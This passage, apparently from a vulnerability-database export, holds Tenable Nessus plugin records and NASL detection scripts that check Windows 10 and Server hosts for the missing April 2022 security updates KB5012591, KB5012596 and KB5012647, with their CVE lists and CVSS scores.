version 1909 / Windows Server 1909 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481,\n CVE-2022-24486, CVE-2022-24494, CVE-2022-24496,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24546, CVE-2022-24547,\n CVE-2022-24549, CVE-2022-24550, CVE-2022-26786,\n CVE-2022-26787, CVE-2022-26788, CVE-2022-26789,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26793,\n CVE-2022-26794, CVE-2022-26795, CVE-2022-26796,\n CVE-2022-26797, CVE-2022-26798, CVE-2022-26801,\n CVE-2022-26802, CVE-2022-26803, CVE-2022-26807,\n CVE-2022-26808, CVE-2022-26810, CVE-2022-26827,\n CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24487,\n CVE-2022-24491, CVE-2022-24492, CVE-2022-24495,\n CVE-2022-24500, CVE-2022-24528, CVE-2022-24533,\n CVE-2022-24534, CVE-2022-24537, CVE-2022-24541,\n CVE-2022-24545, CVE-2022-26809, CVE-2022-26826,\n CVE-2022-26903, CVE-2022-26916, CVE-2022-26917,\n CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498, CVE-2022-26920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012591\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012591'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012591])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:03", "description": "The remote Windows host is missing security update 5012596.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26823, CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": 
"2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012596.NASL", "href": "https://www.tenable.com/plugins/nessus/159677", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159677);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n 
\"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012596\");\n script_xref(name:\"MSFT\", value:\"MS22-5012596\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012596.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, \n CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, \n CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, \n CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, \n CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, \n CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26823, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, \n CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, \n CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, \n CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, \n CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, \n CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-24493, \n CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, \n CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012596\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012596\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User 
Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012596'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012596])\n)\n{\n 
replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:21", "description": "The remote Windows host is missing security update 5012647.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26824, CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", 
"CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012647.NASL", "href": "https://www.tenable.com/plugins/nessus/159675", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159675);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n 
\"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012647\");\n script_xref(name:\"MSFT\", value:\"MS22-5012647\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012647.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, \n CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, \n CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, \n CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, \n CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, \n CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, \n CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, \n CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, \n CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
